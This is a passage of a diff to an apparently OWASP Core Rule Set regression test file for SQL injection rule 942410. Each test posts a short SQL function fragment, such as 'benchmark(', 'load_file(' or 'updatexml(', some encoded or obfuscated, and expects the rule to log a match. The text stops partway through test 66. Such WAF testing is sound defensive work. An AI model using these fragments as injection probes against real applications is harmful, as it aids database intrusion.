test_title: 942410-106 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=updatexml%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-107 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=UpdateXML%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-108 - 
desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=UPPER%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-109 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=user+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-110 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=user%2F%3F%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-111 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=user%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-112 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=values+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-113 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=VALUES%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-114 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=version%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-115 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - 
data: "pay=version%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-116 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=xmltype%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-117 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=XMLType%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-118 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=year%5D%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942410.yaml +tests: + - test_title: 942410-1 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "ABS(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-2 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "benchmark(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-3 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "BENChmARk(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-4 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "cast(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-5 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "CAST(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-6 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "char(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-7 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "chaR(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-8 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "chr(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-9 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "CHR(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-10 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "COALESCE(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-11 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "Compress (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-12 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "concat (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-13 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "cOnCaT(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-14 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "concat_ws(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-15 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "convert(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-16 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "cOnVeRt(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-17 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "COS(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-18 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "COUNT(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-19 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "CURRENT_USER(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-20 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "database (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-21 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "date(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-22 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=date%5D%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-23 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test 
agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=day.+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-24 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=day%26%27%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-25 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=decode%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-26 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=default%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-27 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=ELT%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-28 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + 
User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=encode%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-29 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=ExtractValue%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-30 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=EXTRACTVALUE%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-31 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=floor%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-32 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=FLOOR+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-33 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 
127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=format%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-34 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=GROUP_CONCAT%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-35 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=hex%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-36 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=hEx%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-37 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=if+%21%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-38 + desc: "SQL Injection Attack" + stages: + - 
stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=if+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-39 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=if%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-40 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=if%5C%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-41 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=IFNULL%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-42 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=in+%27%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-43 + desc: "SQL Injection 
Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=IN+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-44 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=IN%2F%2A%2A%2F%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-45 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=insert%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-46 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=left%27%29%3F%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-47 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=LEFT%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - 
test_title: 942410-48 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=length%7C%7C%21%21%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-49 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=length%7C%7C%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-50 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=length%3F%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-51 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=length%26%26%21%21%21%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-52 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: 
"pay=length%26%26%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-53 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=LENGTH%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-54 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=ln+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-55 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=ln%29+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-56 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=load_file%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-57 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: 
POST + port: 80 + uri: "/" + data: "pay=local%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-58 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=log%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-59 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=log%26%26%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-60 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=lower%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-61 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=MAKE_SET%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-62 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=MAX%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-63 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=md5%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-64 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=md5%5C%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-65 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=MID%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-66 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + 